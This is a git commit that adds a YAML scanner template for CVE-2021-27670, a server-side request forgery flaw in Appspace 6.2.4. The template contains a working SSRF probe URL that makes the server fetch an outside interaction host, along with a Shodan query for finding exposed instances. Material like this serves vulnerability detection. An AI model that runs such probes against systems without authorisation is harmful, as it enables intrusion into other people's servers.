Create CVE-2021-27670.yaml

patch-1
Ritik Chaddha 2023-07-25 14:37:18 +05:30 committed by GitHub
parent 6ce685b2c2
commit 3d8c22e811
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2021-27670
info:
name: Appspace 6.2.4 - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
reference:
- https://github.com/h3110mb/PoCSSrfApp
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
classification:
cve-id: CVE-2021-27670
metadata:
max-request: 1
verified: true
shodan-query: title:"Appspace"
tags: cve,cve2023,appspace,ssrf
http:
- method: GET
path:
- '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
- type: status
status:
- 200